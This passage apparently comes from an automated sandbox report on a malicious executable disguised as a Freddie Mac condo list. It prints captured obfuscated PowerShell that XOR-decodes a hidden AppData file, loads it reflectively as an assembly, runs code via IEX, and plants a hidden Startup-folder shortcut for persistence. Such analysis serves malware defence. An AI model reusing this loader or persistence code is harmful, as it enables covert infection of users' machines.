$b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004B5000 push 004B50DEh; ret	1_2_004B50D6
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004B5980 push 004B5A48h; ret	1_2_004B5A40
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00458000 push ecx; mov dword ptr [esp], ecx	1_2_00458005
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0049B03C push ecx; mov dword ptr [esp], edx	1_2_0049B03D
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004A00F8 push ecx; mov dword ptr [esp], edx	1_2_004A00F9
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00458084 push ecx; mov dword ptr [esp], ecx	1_2_00458089
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004B1084 push 004B10ECh; ret	1_2_004B10E4
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004A1094 push ecx; mov dword ptr [esp], edx	1_2_004A1095
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0041A0B4 push ecx; mov dword ptr [esp], ecx	1_2_0041A0B8
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004270BC push 00427104h; ret	1_2_004270FC
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00458108 push ecx; mov dword ptr [esp], ecx	1_2_0045810D
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004321C8 push ecx; mov dword ptr [esp], edx	1_2_004321C9
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004A21D8 push ecx; mov dword ptr [esp], edx	1_2_004A21D9
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0049E1B8 push ecx; mov dword ptr [esp], edx	1_2_0049E1B9
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0049A260 push 0049A378h; ret	1_2_0049A370
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00455268 push ecx; mov dword ptr [esp], ecx	1_2_0045526C
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004252D4 push ecx; mov dword ptr [esp], eax	1_2_004252D9
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004592FC push ecx; mov dword ptr [esp], edx	1_2_004592FD
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0045B284 push ecx; mov dword ptr [esp], edx	1_2_0045B285
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00430358 push ecx; mov dword ptr [esp], eax	1_2_00430359
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00430370 push ecx; mov dword ptr [esp], eax	1_2_00430371
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00459394 push ecx; mov dword ptr [esp], ecx	1_2_00459398
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004A1428 push ecx; mov dword ptr [esp], edx	1_2_004A1429
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0049B424 push ecx; mov dword ptr [esp], edx	1_2_0049B425
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004A24D8 push ecx; mov dword ptr [esp], edx	1_2_004A24D9
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004224F0 push 004225F4h; ret	1_2_004225EC
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004304F0 push ecx; mov dword ptr [esp], eax	1_2_004304F1
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00499490 push ecx; mov dword ptr [esp], edx	1_2_00499493
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00458564 push ecx; mov dword ptr [esp], edx	1_2_00458565
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00458574 push ecx; mov dword ptr [esp], edx	1_2_00458575
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_00457574 push ecx; mov dword ptr [esp], ecx	1_2_00457578

Source: Freddie-Mac-Warrantable-Condo-List.exe	Static PE information: section name: .didata
Source: Freddie-Mac-Warrantable-Condo-List.tmp.1.dr	Static PE information: section name: .didata

Source: Freddie-Mac-Warrantable-Condo-List.tmp.1.dr	Static PE information: real checksum: 0x0 should be: 0x30f293
Source: Freddie-Mac-Warrantable-Condo-List.exe	Static PE information: real checksum: 0x62c96fe should be:

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	File created: C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	File created: C:\Users\user\AppData\Local\Temp\is-JEK0L.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	File created: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Jump to dropped file

Boot Survival:

Powershell creates an autostart link

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .LNK');$a7741f1884746d8b943a3d6a59b94.tArgEtPath=$a6d16d7f160467a9b0e6fddfb5351+'\'+$a4a15c2242e459a842faa1e057416;$a7741f1884746d8b943a3d6a59b94.windowStylE=7;$a7741f1884746d8b943a3d6a59b94.SavE();IEX $a58b687a5fe4d2a2db88334214fab; {[ChAR]$_} $_.PSParentPath.Replace("Microsoft.PowerShell.Core\FileSystem::", "") [String]::Format("{0,10} {1,8}", $_.LastWriteTime.ToString("d"), $_.LastWriteTime.ToString("t")) if ($_ -is [System.IO.DirectoryInfo]) { return '' }if ($_.Attributes -band [System.IO.FileAttributes]::Offline){ return '({0})' -f $_.Length}return $_.Length$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\rRkUWoOfbYI\klWhDKVjsenqCFGPTOu.TUxBOqdDReShXN');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .LNK');$a7741f1884746d8b943a3d6a59b94.tArgEtPath=$a6d16d7f160467a9b0e6fddfb5351+'\'+$a4a15c2242e459a842faa1e057416;$a7741f1884746d8b943a3d6a59b94.windowStylE=7;$a7741f1884746d8b943a3d6a59b94.SavE();IEX $a58b687a5fe4d2a2db88334214fab; {[ChAR]$_} $_.PSParentPath.Replace("Microsoft.PowerShell.Core\FileSystem::", "") [String]::Format("{0,10} {1,8}", $_.LastWriteTime.ToString("d"), $_.LastWriteTime.ToString("t")) if ($_ -is [System.IO.DirectoryInfo]) { return '' }if ($_.Attributes -band [System.IO.FileAttributes]::Offline){ return '({0})' -f $_.Length}return $_.Length$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\AzaONdljHpEnf\ISqTifyHJbs.KnRFhVuafP');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .LNK');$a7741f1884746d8b943a3d6a59b94.tArgEtPath=$a6d16d7f160467a9b0e6fddfb5351+'\'+$a4a15c2242e459a842faa1e057416;$a7741f1884746d8b943a3d6a59b94.windowStylE=7;$a7741f1884746d8b943a3d6a59b94.SavE();IEX $a58b687a5fe4d2a2db88334214fab; {[ChAR]$_} $_.PSParentPath.Replace("Microsoft.PowerShell.Core\FileSystem::", "") [String]::Format("{0,10} {1,8}", $_.LastWriteTime.ToString("d"), $_.LastWriteTime.ToString("t")) if ($_ -is [System.IO.DirectoryInfo]) { return '' }if ($_.Attributes -band [System.IO.FileAttributes]::Offline){ return '({0})' -f $_.Length}return $_.Length$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\dtHwUGMVpNuBrlWFzj\JzvhPoFDRHdYI.EAHsBOdtVWUSGD');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT(

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\MiCrOSOfT\WIndoWS\sTArT mEnu\PrOgramS\sTArTuP\a65a7aeb5fe4978dc705b96d177e7.LNK

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\MiCrOSOfT\WIndoWS\sTArT mEnu\PrOgramS\sTArTuP\a65a7aeb5fe4978dc705b96d177e7.LNK

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_005C90B4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,		5_2_005C90B4
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_006A68B0 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,		5_2_006A68B0

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
